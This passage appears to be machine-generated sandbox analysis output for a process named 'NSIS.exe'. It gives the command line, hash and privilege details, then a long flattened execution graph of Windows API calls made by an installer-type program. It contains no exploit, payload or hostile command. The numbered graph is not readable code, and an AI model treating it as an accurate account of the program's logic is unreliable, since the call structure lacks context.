                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Programs\NSIS\NSIS.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\NSIS" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1180,i,11364209571960262767,7852169953357836593,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff7373a0000
                                                                                                                                                                                            File size:188'826'112 bytes
                                                                                                                                                                                            MD5 hash:BD4906B9305AFEC35A88A3387BCB9FAC
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:25.8%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:20.2%
                                                                                                                                                                                              Total number of Nodes:1333
                                                                                                                                                                                              Total number of Limit Nodes:33
CreateDirectoryW 3114->3130 3115->3114 3133 406694 GetModuleHandleA 3118->3133 3122 405842 GetLastError 3121->3122 3123 40583e 3121->3123 3122->3123 3124 405851 SetFileSecurityW 3122->3124 3123->3114 3124->3123 3125 405867 GetLastError 3124->3125 3125->3123 3127 405322 24 API calls 3126->3127 3128 401431 3127->3128 3129 4062ba lstrcpynW 3128->3129 3129->3113 3131 405882 GetLastError 3130->3131 3132 40587e 3130->3132 3131->3132 3132->3114 3134 4066b0 3133->3134 3135 4066ba GetProcAddress 3133->3135 3139 406624 GetSystemDirectoryW 3134->3139 3137 405892 3135->3137 3137->3114 3138 4066b6 3138->3135 3138->3137 3140 406646 wsprintfW LoadLibraryExW 3139->3140 3140->3138 3294 401e49 3295 402c1f 17 API calls 3294->3295 3296 401e4f 3295->3296 3297 402c1f 17 API calls 3296->3297 3298 401e5b 3297->3298 3299 401e72 EnableWindow 3298->3299 3300 401e67 ShowWindow 3298->3300 3301 402ac5 3299->3301 3300->3301 3756 40264a 3757 402c1f 17 API calls 3756->3757 3761 402659 3757->3761 3758 4026a3 ReadFile 3758->3761 3768 402796 3758->3768 3759 405e33 ReadFile 3759->3761 3761->3758 3761->3759 3762 4026e3 MultiByteToWideChar 3761->3762 3763 402798 3761->3763 3765 402709 SetFilePointer MultiByteToWideChar 3761->3765 3766 4027a9 3761->3766 3761->3768 3769 405e91 SetFilePointer 3761->3769 3762->3761 3778 406201 wsprintfW 3763->3778 3765->3761 3767 4027ca SetFilePointer 3766->3767 3766->3768 3767->3768 3770 405ead 3769->3770 3771 405ec5 3769->3771 3772 405e33 ReadFile 3770->3772 3771->3761 3773 405eb9 3772->3773 3773->3771 3774 405ef6 SetFilePointer 3773->3774 3775 405ece SetFilePointer 3773->3775 3774->3771 3775->3774 3776 405ed9 3775->3776 3777 405e62 WriteFile 3776->3777 3777->3771 3778->3768 3782 4016cc 3783 402c41 17 API calls 3782->3783 3784 4016d2 GetFullPathNameW 3783->3784 3785 4016ec 3784->3785 3791 40170e 3784->3791 3788 4065fd 2 API calls 3785->3788 3785->3791 3786 401723 GetShortPathNameW 3787 402ac5 3786->3787 3789 4016fe 3788->3789 3789->3791 3792 4062ba lstrcpynW 3789->3792 
3791->3786 3791->3787 3792->3791 3793 40234e 3794 402c41 17 API calls 3793->3794 3795 40235d 3794->3795 3796 402c41 17 API calls 3795->3796 3797 402366 3796->3797 3798 402c41 17 API calls 3797->3798 3799 402370 GetPrivateProfileStringW 3798->3799 3582 4038d0 3583 4038e8 3582->3583 3584 4038da CloseHandle 3582->3584 3589 403915 3583->3589 3584->3583 3587 4059cc 67 API calls 3588 4038f9 3587->3588 3590 403923 3589->3590 3591 4038ed 3590->3591 3592 403928 FreeLibrary GlobalFree 3590->3592 3591->3587 3592->3591 3592->3592 3800 401b53 3801 402c41 17 API calls 3800->3801 3802 401b5a 3801->3802 3803 402c1f 17 API calls 3802->3803 3804 401b63 wsprintfW 3803->3804 3805 402ac5 3804->3805 3806 401956 3807 402c41 17 API calls 3806->3807 3808 40195d lstrlenW 3807->3808 3809 402592 3808->3809 3810 4014d7 3811 402c1f 17 API calls 3810->3811 3812 4014dd Sleep 3811->3812 3814 402ac5 3812->3814 3639 403d58 3640 403d70 3639->3640 3641 403eab 3639->3641 3640->3641 3642 403d7c 3640->3642 3643 403efc 3641->3643 3644 403ebc GetDlgItem GetDlgItem 3641->3644 3646 403d87 SetWindowPos 3642->3646 3647 403d9a 3642->3647 3645 403f56 3643->3645 3653 401389 2 API calls 3643->3653 3648 404231 18 API calls 3644->3648 3649 40427d SendMessageW 3645->3649 3670 403ea6 3645->3670 3646->3647 3650 403db7 3647->3650 3651 403d9f ShowWindow 3647->3651 3652 403ee6 SetClassLongW 3648->3652 3682 403f68 3649->3682 3654 403dd9 3650->3654 3655 403dbf DestroyWindow 3650->3655 3651->3650 3656 40140b 2 API calls 3652->3656 3657 403f2e 3653->3657 3658 403dde SetWindowLongW 3654->3658 3659 403def 3654->3659 3709 4041ba 3655->3709 3656->3643 3657->3645 3662 403f32 SendMessageW 3657->3662 3658->3670 3660 403e98 3659->3660 3661 403dfb GetDlgItem 3659->3661 3667 404298 8 API calls 3660->3667 3665 403e2b 3661->3665 3666 403e0e SendMessageW IsWindowEnabled 3661->3666 3662->3670 3663 40140b 2 API calls 3663->3682 3664 4041bc DestroyWindow EndDialog 3664->3709 3669 403e30 3665->3669 3672 403e38 3665->3672 3674 403e7f 
SendMessageW 3665->3674 3675 403e4b 3665->3675 3666->3665 3666->3670 3667->3670 3668 4041eb ShowWindow 3668->3670 3676 40420a SendMessageW 3669->3676 3671 4062dc 17 API calls 3671->3682 3672->3669 3672->3674 3673 404231 18 API calls 3673->3682 3674->3660 3678 403e53 3675->3678 3679 403e68 3675->3679 3677 403e66 3676->3677 3677->3660 3681 40140b 2 API calls 3678->3681 3680 40140b 2 API calls 3679->3680 3683 403e6f 3680->3683 3681->3669 3682->3663 3682->3664 3682->3670 3682->3671 3682->3673 3684 404231 18 API calls 3682->3684 3700 4040fc DestroyWindow 3682->3700 3683->3660 3683->3669 3685 403fe3 GetDlgItem 3684->3685 3686 404000 ShowWindow KiUserCallbackDispatcher 3685->3686 3687 403ff8 3685->3687 3710 404253 KiUserCallbackDispatcher 3686->3710 3687->3686 3689 40402a EnableWindow 3694 40403e 3689->3694 3690 404043 GetSystemMenu EnableMenuItem SendMessageW 3691 404073 SendMessageW 3690->3691 3690->3694 3691->3694 3693 403d39 18 API calls 3693->3694 3694->3690 3694->3693 3711 404266 SendMessageW 3694->3711 3712 4062ba lstrcpynW 3694->3712 3696 4040a2 lstrlenW 3697 4062dc 17 API calls 3696->3697 3698 4040b8 SetWindowTextW 3697->3698 3699 401389 2 API calls 3698->3699 3699->3682 3701 404116 CreateDialogParamW 3700->3701 3700->3709 3702 404149 3701->3702 3701->3709 3703 404231 18 API calls 3702->3703 3704 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3703->3704 3705 401389 2 API calls 3704->3705 3706 40419a 3705->3706 3706->3670 3707 4041a2 ShowWindow 3706->3707 3708 40427d SendMessageW 3707->3708 3708->3709 3709->3668 3709->3670 3710->3689 3711->3694 3712->3696 3815 401f58 3816 402c41 17 API calls 3815->3816 3817 401f5f 3816->3817 3818 4065fd 2 API calls 3817->3818 3819 401f65 3818->3819 3821 401f76 3819->3821 3822 406201 wsprintfW 3819->3822 3822->3821 3713 402259 3714 402c41 17 API calls 3713->3714 3715 40225f 3714->3715 3716 402c41 17 API calls 3715->3716 3717 402268 3716->3717 3718 402c41 17 API calls 3717->3718 3719 402271 3718->3719 3720 4065fd 2 API 
calls 3719->3720 3721 40227a 3720->3721 3722 40228b lstrlenW lstrlenW 3721->3722 3723 40227e 3721->3723 3725 405322 24 API calls 3722->3725 3724 405322 24 API calls 3723->3724 3727 402286 3723->3727 3724->3727 3726 4022c9 SHFileOperationW 3725->3726 3726->3723 3726->3727 3823 4046db 3824 404711 3823->3824 3825 4046eb 3823->3825 3827 404298 8 API calls 3824->3827 3826 404231 18 API calls 3825->3826 3828 4046f8 SetDlgItemTextW 3826->3828 3829 40471d 3827->3829 3828->3824 3728 40175c 3729 402c41 17 API calls 3728->3729 3730 401763 3729->3730 3731 405ddf 2 API calls 3730->3731 3732 40176a 3731->3732 3733 405ddf 2 API calls 3732->3733 3733->3732 3830 401d5d GetDlgItem GetClientRect 3831 402c41 17 API calls 3830->3831 3832 401d8f LoadImageW SendMessageW 3831->3832 3833 402ac5 3832->3833 3834 401dad DeleteObject 3832->3834 3834->3833 3835 4022dd 3836 4022e4 3835->3836 3837 4022f7 3835->3837 3838 4062dc 17 API calls 3836->3838 3839 4022f1 3838->3839 3840 405920 MessageBoxIndirectW 3839->3840 3840->3837 3142 405461 3143 405482 GetDlgItem GetDlgItem GetDlgItem 3142->3143 3144 40560b 3142->3144 3188 404266 SendMessageW 3143->3188 3146 405614 GetDlgItem CreateThread CloseHandle 3144->3146 3147 40563c 3144->3147 3146->3147 3211 4053f5 OleInitialize 3146->3211 3149 405667 3147->3149 3150 405653 ShowWindow ShowWindow 3147->3150 3151 40568c 3147->3151 3148 4054f2 3155 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3148->3155 3152 405673 3149->3152 3153 4056c7 3149->3153 3193 404266 SendMessageW 3150->3193 3197 404298 3151->3197 3157 4056a1 ShowWindow 3152->3157 3158 40567b 3152->3158 3153->3151 3163 4056d5 SendMessageW 3153->3163 3161 405567 3155->3161 3162 40554b SendMessageW SendMessageW 3155->3162 3159 4056c1 3157->3159 3160 4056b3 3157->3160 3194 40420a 3158->3194 3166 40420a SendMessageW 3159->3166 3165 405322 24 API calls 3160->3165 3167 40557a 3161->3167 3168 40556c SendMessageW 3161->3168 3162->3161 3169 40569a 3163->3169 3170 4056ee CreatePopupMenu 
3163->3170 3165->3159 3166->3153 3189 404231 3167->3189 3168->3167 3171 4062dc 17 API calls 3170->3171 3173 4056fe AppendMenuW 3171->3173 3175 40571b GetWindowRect 3173->3175 3176 40572e TrackPopupMenu 3173->3176 3174 40558a 3177 405593 ShowWindow 3174->3177 3178 4055c7 GetDlgItem SendMessageW 3174->3178 3175->3176 3176->3169 3180 405749 3176->3180 3181 4055b6 3177->3181 3182 4055a9 ShowWindow 3177->3182 3178->3169 3179 4055ee SendMessageW SendMessageW 3178->3179 3179->3169 3183 405765 SendMessageW 3180->3183 3192 404266 SendMessageW 3181->3192 3182->3181 3183->3183 3184 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3183->3184 3186 4057a7 SendMessageW 3184->3186 3186->3186 3187 4057d0 GlobalUnlock SetClipboardData CloseClipboard 3186->3187 3187->3169 3188->3148 3190 4062dc 17 API calls 3189->3190 3191 40423c SetDlgItemTextW 3190->3191 3191->3174 3192->3178 3193->3149 3195 404211 3194->3195 3196 404217 SendMessageW 3194->3196 3195->3196 3196->3151 3198 40435b 3197->3198 3199 4042b0 GetWindowLongW 3197->3199 3198->3169 3199->3198 3200 4042c5 3199->3200 3200->3198 3201 4042f2 GetSysColor 3200->3201 3202 4042f5 3200->3202 3201->3202 3203 404305 SetBkMode 3202->3203 3204 4042fb SetTextColor 3202->3204 3205 404323 3203->3205 3206 40431d GetSysColor 3203->3206 3204->3203 3207 404334 3205->3207 3208 40432a SetBkColor 3205->3208 3206->3205 3207->3198 3209 404347 DeleteObject 3207->3209 3210 40434e CreateBrushIndirect 3207->3210 3208->3207 3209->3210 3210->3198 3218 40427d 3211->3218 3213 405418 3217 40543f 3213->3217 3221 401389 3213->3221 3214 40427d SendMessageW 3215 405451 CoUninitialize 3214->3215 3217->3214 3219 404295 3218->3219 3220 404286 SendMessageW 3218->3220 3219->3213 3220->3219 3223 401390 3221->3223 3222 4013fe 3222->3213 3223->3222 3224 4013cb MulDiv SendMessageW 3223->3224 3224->3223 3841 401563 3842 402a6b 3841->3842 3845 406201 wsprintfW 3842->3845 3844 402a70 3845->3844 3225 4023e4 3226 402c41 17 API calls 3225->3226 3227 4023f6 3226->3227 
3228 402c41 17 API calls 3227->3228 3229 402400 3228->3229 3242 402cd1 3229->3242 3232 402ac5 3233 402438 3234 402444 3233->3234 3246 402c1f 3233->3246 3237 402463 RegSetValueExW 3234->3237 3249 403116 3234->3249 3235 402c41 17 API calls 3238 40242e lstrlenW 3235->3238 3240 402479 RegCloseKey 3237->3240 3238->3233 3240->3232 3243 402cec 3242->3243 3269 406155 3243->3269 3247 4062dc 17 API calls 3246->3247 3248 402c34 3247->3248 3248->3234 3250 40312f 3249->3250 3251 40315d 3250->3251 3276 403347 SetFilePointer 3250->3276 3273 403331 3251->3273 3255 4032ca 3257 40330c 3255->3257 3262 4032ce 3255->3262 3256 40317a GetTickCount 3258 4032b4 3256->3258 3265 4031c9 3256->3265 3260 403331 ReadFile 3257->3260 3258->3237 3259 403331 ReadFile 3259->3265 3260->3258 3261 403331 ReadFile 3261->3262 3262->3258 3262->3261 3263 405e62 WriteFile 3262->3263 3263->3262 3264 40321f GetTickCount 3264->3265 3265->3258 3265->3259 3265->3264 3266 403244 MulDiv wsprintfW 3265->3266 3268 405e62 WriteFile 3265->3268 3267 405322 24 API calls 3266->3267 3267->3265 3268->3265 3270 406164 3269->3270 3271 402410 3270->3271 3272 40616f RegCreateKeyExW 3270->3272 3271->3232 3271->3233 3271->3235 3272->3271 3274 405e33 ReadFile 3273->3274 3275 403168 3274->3275 3275->3255 3275->3256 3275->3258 3276->3251 3846 404367 lstrcpynW lstrlenW 3847 401968 3848 402c1f 17 API calls 3847->3848 3849 40196f 3848->3849 3850 402c1f 17 API calls 3849->3850 3851 40197c 3850->3851 3852 402c41 17 API calls 3851->3852 3853 401993 lstrlenW 3852->3853 3854 4019a4 3853->3854 3855 4019e5 3854->3855 3859 4062ba lstrcpynW 3854->3859 3857 4019d5 3857->3855 3858 4019da lstrlenW 3857->3858 3858->3855 3859->3857 3860 402868 3861 402c41 17 API calls 3860->3861 3862 40286f FindFirstFileW 3861->3862 3863 402882 3862->3863 3864 402897 3862->3864 3868 406201 wsprintfW 3864->3868 3866 4028a0 3869 4062ba lstrcpynW 3866->3869 3868->3866 3869->3863 3870 403968 3871 403973 3870->3871 3872 403977 3871->3872 3873 40397a GlobalAlloc 
3871->3873 3873->3872 3874 40166a 3875 402c41 17 API calls 3874->3875 3876 401670 3875->3876 3877 4065fd 2 API calls 3876->3877 3878 401676 3877->3878 3302 40176f 3303 402c41 17 API calls 3302->3303 3304 401776 3303->3304 3305 401796 3304->3305 3306 40179e 3304->3306 3341 4062ba lstrcpynW 3305->3341 3342 4062ba lstrcpynW 3306->3342 3309 40179c 3313 40654e 5 API calls 3309->3313 3310 4017a9 3311 405b8f 3 API calls 3310->3311 3312 4017af lstrcatW 3311->3312 3312->3309 3331 4017bb 3313->3331 3314 4065fd 2 API calls 3314->3331 3315 405d8b 2 API calls 3315->3331 3317 4017cd CompareFileTime 3317->3331 3318 40188d 3320 405322 24 API calls 3318->3320 3319 401864 3321 405322 24 API calls 3319->3321 3330 401879 3319->3330 3322 401897 3320->3322 3321->3330 3323 403116 31 API calls 3322->3323 3325 4018aa 3323->3325 3324 4062ba lstrcpynW 3324->3331 3326 4018be SetFileTime 3325->3326 3328 4018d0 CloseHandle 3325->3328 3326->3328 3327 4062dc 17 API calls 3327->3331 3329 4018e1 3328->3329 3328->3330 3332 4018e6 3329->3332 3333 4018f9 3329->3333 3331->3314 3331->3315 3331->3317 3331->3318 3331->3319 3331->3324 3331->3327 3340 405db0 GetFileAttributesW CreateFileW 3331->3340 3343 405920 3331->3343 3334 4062dc 17 API calls 3332->3334 3335 4062dc 17 API calls 3333->3335 3336 4018ee lstrcatW 3334->3336 3337 401901 3335->3337 3336->3337 3339 405920 MessageBoxIndirectW 3337->3339 3339->3330 3340->3331 3341->3309 3342->3310 3344 405935 3343->3344 3345 405981 3344->3345 3346 405949 MessageBoxIndirectW 3344->3346 3345->3331 3346->3345 3879 4027ef 3880 4027f6 3879->3880 3883 402a70 3879->3883 3881 402c1f 17 API calls 3880->3881 3882 4027fd 3881->3882 3884 40280c SetFilePointer 3882->3884 3884->3883 3885 40281c 3884->3885 3887 406201 wsprintfW 3885->3887 3887->3883 3888 4043f0 3889 404408 3888->3889 3893 404522 3888->3893 3894 404231 18 API calls 3889->3894 3890 40458c 3891 404656 3890->3891 3892 404596 GetDlgItem 3890->3892 3899 404298 8 API calls 3891->3899 3895 4045b0 3892->3895 3896 
404617 3892->3896 3893->3890 3893->3891 3897 40455d GetDlgItem SendMessageW 3893->3897 3898 40446f 3894->3898 3895->3896 3902 4045d6 SendMessageW LoadCursorW SetCursor 3895->3902 3896->3891 3903 404629 3896->3903 3921 404253 KiUserCallbackDispatcher 3897->3921 3901 404231 18 API calls 3898->3901 3909 404651 3899->3909 3905 40447c CheckDlgButton 3901->3905 3925 40469f 3902->3925 3907 40463f 3903->3907 3908 40462f SendMessageW 3903->3908 3904 404587 3922 40467b 3904->3922 3919 404253 KiUserCallbackDispatcher 3905->3919 3907->3909 3910 404645 SendMessageW 3907->3910 3908->3907 3910->3909 3914 40449a GetDlgItem 3920 404266 SendMessageW 3914->3920 3916 4044b0 SendMessageW 3917 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3916->3917 3918 4044cd GetSysColor 3916->3918 3917->3909 3918->3917 3919->3914 3920->3916 3921->3904 3923 404689 3922->3923 3924 40468e SendMessageW 3922->3924 3923->3924 3924->3890 3928 4058e6 ShellExecuteExW 3925->3928 3927 404605 LoadCursorW SetCursor 3927->3896 3928->3927 3929 401a72 3930 402c1f 17 API calls 3929->3930 3931 401a7b 3930->3931 3932 402c1f 17 API calls 3931->3932 3933 401a20 3932->3933 3934 401573 3935 401583 ShowWindow 3934->3935 3936 40158c 3934->3936 3935->3936 3937 40159a ShowWindow 3936->3937 3938 402ac5 3936->3938 3937->3938 3939 402df3 3940 402e05 SetTimer 3939->3940 3941 402e1e 3939->3941 3940->3941 3942 402e73 3941->3942 3943 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3941->3943 3943->3942 3944 401cf3 3945 402c1f 17 API calls 3944->3945 3946 401cf9 IsWindow 3945->3946 3947 401a20 3946->3947 3948 4014f5 SetForegroundWindow 3949 402ac5 3948->3949 3950 402576 3951 402c41 17 API calls 3950->3951 3952 40257d 3951->3952 3955 405db0 GetFileAttributesW CreateFileW 3952->3955 3954 402589 3955->3954 3616 401b77 3617 401bc8 3616->3617 3619 401b84 3616->3619 3620 401bf2 GlobalAlloc 3617->3620 3621 401bcd 3617->3621 3618 4022e4 3623 4062dc 17 API calls 3618->3623 3619->3618 3625 401b9b 3619->3625 3622 
4062dc 17 API calls 3620->3622 3631 401c0d 3621->3631 3635 4062ba lstrcpynW 3621->3635 3622->3631 3624 4022f1 3623->3624 3629 405920 MessageBoxIndirectW 3624->3629 3636 4062ba lstrcpynW 3625->3636 3628 401bdf GlobalFree 3628->3631 3629->3631 3630 401baa 3637 4062ba lstrcpynW 3630->3637 3633 401bb9 3638 4062ba lstrcpynW 3633->3638 3635->3628 3636->3630 3637->3633 3638->3631 3956 404a78 3957 404aa4 3956->3957 3958 404a88 3956->3958 3960 404ad7 3957->3960 3961 404aaa SHGetPathFromIDListW 3957->3961 3967 405904 GetDlgItemTextW 3958->3967 3963 404ac1 SendMessageW 3961->3963 3964 404aba 3961->3964 3962 404a95 SendMessageW 3962->3957 3963->3960 3966 40140b 2 API calls 3964->3966 3966->3963 3967->3962 3968 4024f8 3969 402c81 17 API calls 3968->3969 3970 402502 3969->3970 3971 402c1f 17 API calls 3970->3971 3972 40250b 3971->3972 3973 402533 RegEnumValueW 3972->3973 3974 402527 RegEnumKeyW 3972->3974 3976 40288b 3972->3976 3975 402548 RegCloseKey 3973->3975 3974->3975 3975->3976 3978 40167b 3979 402c41 17 API calls 3978->3979 3980 401682 3979->3980 3981 402c41 17 API calls 3980->3981 3982 40168b 3981->3982 3983 402c41 17 API calls 3982->3983 3984 401694 MoveFileW 3983->3984 3985 4016a7 3984->3985 3991 4016a0 3984->3991 3987 4065fd 2 API calls 3985->3987 3989 402250 3985->3989 3986 401423 24 API calls 3986->3989 3988 4016b6 3987->3988 3988->3989 3990 406080 36 API calls 3988->3990 3990->3991 3991->3986 3992 401e7d 3993 402c41 17 API calls 3992->3993 3994 401e83 3993->3994 3995 402c41 17 API calls 3994->3995 3996 401e8c 3995->3996 3997 402c41 17 API calls 3996->3997 3998 401e95 3997->3998 3999 402c41 17 API calls 3998->3999 4000 401e9e 3999->4000 4001 401423 24 API calls 4000->4001 4002 401ea5 4001->4002 4009 4058e6 ShellExecuteExW 4002->4009 4004 401ee7 4007 40288b 4004->4007 4010 406745 WaitForSingleObject 4004->4010 4006 401f01 CloseHandle 4006->4007 4009->4004 4011 40675f 4010->4011 4012 406771 GetExitCodeProcess 4011->4012 4013 4066d0 2 API calls 4011->4013 4012->4006 
4014 406766 WaitForSingleObject 4013->4014 4014->4011 4015 4019ff 4016 402c41 17 API calls 4015->4016 4017 401a06 4016->4017 4018 402c41 17 API calls 4017->4018 4019 401a0f 4018->4019 4020 401a16 lstrcmpiW 4019->4020 4021 401a28 lstrcmpW 4019->4021 4022 401a1c 4020->4022 4021->4022 4023 401000 4024 401037 BeginPaint GetClientRect 4023->4024 4025 40100c DefWindowProcW 4023->4025 4027 4010f3 4024->4027 4028 401179 4025->4028 4029 401073 CreateBrushIndirect FillRect DeleteObject 4027->4029 4030 4010fc 4027->4030 4029->4027 4031 401102 CreateFontIndirectW 4030->4031 4032 401167 EndPaint 4030->4032 4031->4032 4033 401112 6 API calls 4031->4033 4032->4028 4033->4032 4034 401503 4035 40150b 4034->4035 4037 40151e 4034->4037 4036 402c1f 17 API calls 4035->4036 4036->4037 3277 402484 3288 402c81 3277->3288 3280 402c41 17 API calls 3281 402497 3280->3281 3282 4024a2 RegQueryValueExW 3281->3282 3283 40288b 3281->3283 3284 4024c2 3282->3284 3285 4024c8 RegCloseKey 3282->3285 3284->3285 3293 406201 wsprintfW 3284->3293 3285->3283 3289 402c41 17 API calls 3288->3289 3290 402c98 3289->3290 3291 406127 RegOpenKeyExW 3290->3291 3292 40248e 3291->3292 3292->3280 3293->3285 4038 402104 4039 402c41 17 API calls 4038->4039 4040 40210b 4039->4040 4041 402c41 17 API calls 4040->4041 4042 402115 4041->4042 4043 402c41 17 API calls 4042->4043 4044 40211f 4043->4044 4045 402c41 17 API calls 4044->4045 4046 402129 4045->4046 4047 402c41 17 API calls 4046->4047 4049 402133 4047->4049 4048 402172 CoCreateInstance 4053 402191 4048->4053 4049->4048 4050 402c41 17 API calls 4049->4050 4050->4048 4051 401423 24 API calls 4052 402250 4051->4052 4053->4051 4053->4052 4054 401f06 4055 402c41 17 API calls 4054->4055 4056 401f0c 4055->4056 4057 405322 24 API calls 4056->4057 4058 401f16 4057->4058 4059 4058a3 2 API calls 4058->4059 4060 401f1c 4059->4060 4061 401f3f CloseHandle 4060->4061 4062 40288b 4060->4062 4063 406745 5 API calls 4060->4063 4061->4062 4065 401f31 4063->4065 4065->4061 4067 406201 
wsprintfW 4065->4067 4067->4061 4068 40190c 4069 401943 4068->4069 4070 402c41 17 API calls 4069->4070 4071 401948 4070->4071 4072 4059cc 67 API calls 4071->4072 4073 401951 4072->4073 4074 40230c 4075 402314 4074->4075 4077 40231a 4074->4077 4076 402c41 17 API calls 4075->4076 4076->4077 4078 402328 4077->4078 4080 402c41 17 API calls 4077->4080 4079 402336 4078->4079 4081 402c41 17 API calls 4078->4081 4082 402c41 17 API calls 4079->4082 4080->4078 4081->4079 4083 40233f WritePrivateProfileStringW 4082->4083 4084 401f8c 4085 402c41 17 API calls 4084->4085 4086 401f93 4085->4086 4087 406694 5 API calls 4086->4087 4088 401fa2 4087->4088 4089 402026 4088->4089 4090 401fbe GlobalAlloc 4088->4090 4090->4089 4091 401fd2 4090->4091 4092 406694 5 API calls 4091->4092 4093 401fd9 4092->4093 4094 406694 5 API calls 4093->4094 4095 401fe3 4094->4095 4095->4089 4099 406201 wsprintfW 4095->4099 4097 402018 4100 406201 wsprintfW 4097->4100 4099->4097 4100->4089 4101 40238e 4102 4023c1 4101->4102 4103 402396 4101->4103 4105 402c41 17 API calls 4102->4105 4104 402c81 17 API calls 4103->4104 4107 40239d 4104->4107 4106 4023c8 4105->4106 4112 402cff 4106->4112 4109 4023d5 4107->4109 4110 402c41 17 API calls 4107->4110 4111 4023ae RegDeleteValueW RegCloseKey 4110->4111 4111->4109 4113 402d13 4112->4113 4115 402d0c 4112->4115 4113->4115 4116 402d44 4113->4116 4115->4109 4117 406127 RegOpenKeyExW 4116->4117 4118 402d72 4117->4118 4119 402d98 RegEnumKeyW 4118->4119 4120 402daf RegCloseKey 4118->4120 4121 402dd0 RegCloseKey 4118->4121 4123 402d44 6 API calls 4118->4123 4126 402dc3 4118->4126 4119->4118 4119->4120 4122 406694 5 API calls 4120->4122 4121->4126 4124 402dbf 4122->4124 4123->4118 4125 402de0 RegDeleteKeyW 4124->4125 4124->4126 4125->4126 4126->4115 3347 40338f SetErrorMode GetVersion 3348 4033ce 3347->3348 3349 4033d4 3347->3349 3350 406694 5 API calls 3348->3350 3351 406624 3 API calls 3349->3351 3350->3349 3352 4033ea lstrlenA 3351->3352 3352->3349 3353 4033fa 3352->3353 
3354 406694 5 API calls 3353->3354 3355 403401 3354->3355 3356 406694 5 API calls 3355->3356 3357 403408 3356->3357 3358 406694 5 API calls 3357->3358 3359 403414 #17 OleInitialize SHGetFileInfoW 3358->3359 3437 4062ba lstrcpynW 3359->3437 3362 403460 GetCommandLineW 3438 4062ba lstrcpynW 3362->3438 3364 403472 3365 405bbc CharNextW 3364->3365 3366 403497 CharNextW 3365->3366 3367 4035c1 GetTempPathW 3366->3367 3378 4034b0 3366->3378 3439 40335e 3367->3439 3369 4035d9 3370 403633 DeleteFileW 3369->3370 3371 4035dd GetWindowsDirectoryW lstrcatW 3369->3371 3449 402edd GetTickCount GetModuleFileNameW 3370->3449 3372 40335e 12 API calls 3371->3372 3375 4035f9 3372->3375 3373 405bbc CharNextW 3373->3378 3375->3370 3377 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3375->3377 3376 403647 3379 4036fe ExitProcess CoUninitialize 3376->3379 3388 405bbc CharNextW 3376->3388 3420 4036ea 3376->3420 3380 40335e 12 API calls 3377->3380 3378->3373 3381 4035ac 3378->3381 3382 4035aa 3378->3382 3383 403834 3379->3383 3384 403714 3379->3384 3386 40362b 3380->3386 3533 4062ba lstrcpynW 3381->3533 3382->3367 3385 40383c GetCurrentProcess OpenProcessToken 3383->3385 3395 4038b8 ExitProcess 3383->3395 3390 405920 MessageBoxIndirectW 3384->3390 3392 403854 LookupPrivilegeValueW AdjustTokenPrivileges 3385->3392 3393 403888 3385->3393 3386->3370 3386->3379 3404 403666 3388->3404 3391 403722 ExitProcess 3390->3391 3392->3393 3397 406694 5 API calls 3393->3397 3394 4036fa 3394->3379 3400 40388f 3397->3400 3398 4036c4 3402 405c97 18 API calls 3398->3402 3399 40372a 3401 40588b 5 API calls 3399->3401 3403 4038a4 ExitWindowsEx 3400->3403 3407 4038b1 3400->3407 3405 40372f lstrcatW 3401->3405 3406 4036d0 3402->3406 3403->3395 3403->3407 3404->3398 3404->3399 3408 403740 lstrcatW 3405->3408 3409 40374b lstrcatW lstrcmpiW 3405->3409 3406->3379 3534 4062ba lstrcpynW 3406->3534 3541 40140b 3407->3541 3408->3409 3409->3379 3411 403767 3409->3411 3413 403773 3411->3413 
3414 40376c 3411->3414 3418 40586e 2 API calls 3413->3418 3416 4057f1 4 API calls 3414->3416 3415 4036df 3535 4062ba lstrcpynW 3415->3535 3419 403771 3416->3419 3421 403778 SetCurrentDirectoryW 3418->3421 3419->3421 3477 4039aa 3420->3477 3422 403793 3421->3422 3423 403788 3421->3423 3537 4062ba lstrcpynW 3422->3537 3536 4062ba lstrcpynW 3423->3536 3426 4062dc 17 API calls 3427 4037d2 DeleteFileW 3426->3427 3428 4037df CopyFileW 3427->3428 3434 4037a1 3427->3434 3428->3434 3429 403828 3430 406080 36 API calls 3429->3430 3432 40382f 3430->3432 3431 406080 36 API calls 3431->3434 3432->3379 3433 4062dc 17 API calls 3433->3434 3434->3426 3434->3429 3434->3431 3434->3433 3436 403813 CloseHandle 3434->3436 3538 4058a3 CreateProcessW 3434->3538 3436->3434 3437->3362 3438->3364 3440 40654e 5 API calls 3439->3440 3442 40336a 3440->3442 3441 403374 3441->3369 3442->3441 3443 405b8f 3 API calls 3442->3443 3444 40337c 3443->3444 3445 40586e 2 API calls 3444->3445 3446 403382 3445->3446 3544 405ddf 3446->3544 3548 405db0 GetFileAttributesW CreateFileW 3449->3548 3451 402f1d 3476 402f2d 3451->3476 3549 4062ba lstrcpynW 3451->3549 3453 402f43 3454 405bdb 2 API calls 3453->3454 3455 402f49 3454->3455 3550 4062ba lstrcpynW 3455->3550 3457 402f54 GetFileSize 3458 403050 3457->3458 3475 402f6b 3457->3475 3551 402e79 3458->3551 3460 403059 3462 403089 GlobalAlloc 3460->3462 3460->3476 3563 403347 